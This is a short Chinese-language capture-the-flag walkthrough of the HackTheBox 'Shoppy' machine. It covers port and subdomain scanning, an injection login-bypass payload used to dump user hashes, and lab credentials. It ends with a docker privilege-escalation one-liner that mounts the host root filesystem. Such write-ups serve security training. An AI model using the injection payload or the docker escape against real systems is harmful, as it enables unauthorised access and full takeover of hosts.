HackTheBox Shoppy

端口扫描

nmap -sC -sS -sV 10.10.11.180 -o shoppy

echo "10.10.11.180 shoppy.htb" >> /etc/hosts 添加到hosts文件

目录扫描

扫描目录，只有login和admin可以正常访问，访问admin会直接跳转到login登陆页面

SQL注入之特殊的万能密码

查看访问源代码，没有发现什么

抓包瞅瞅，没有验证码校验，尝试万能密码登陆，但是这次这个万能密码我是头一次见 admin'||''==='

登陆后台来到admin页面，看到右上角有个搜索，尝试搜索一下

将刚才的万能密码放进去，发现出来两个账号，密码是md5加密

经过md5解密，获取到如下密码

admin:undefined
josh:remembermethisway

子域名扫描

获取到josh的账号密码，先来试试ssh登陆，但是失败了；心想肯定没这么简单，想到还没有进行子域名扫描，先来扫一波（可以同时用不同的字典进行扫描，可能会有意外的惊喜）

wfuzz -u shoppy.htb -H "Host:FUZZ.shoppy.htb" -w /usr/share/dnsenum/dns.txt --hl 7

josh:remembermethisway

使用这个账号密码可以成功登陆

查看各个页面有什么可用信息，发现jaeger和josh的对话中有jaeger的密码。

docker提权

username: jaeger
password: Sh0ppyBest@pp!

查看/home/deploy/password-manager文件，注意：提示那里有点坑，单词和密码中间没有空格

sudo -u deploy /home/deploy/password-manager

查看用户id，发现存在docker，这下事情就变得简单了。

docker提权：https://gtfobins.github.io/gtfobins/docker/

docker run -v /:/mnt --rm -it alpine chroot /mnt/ sh

flag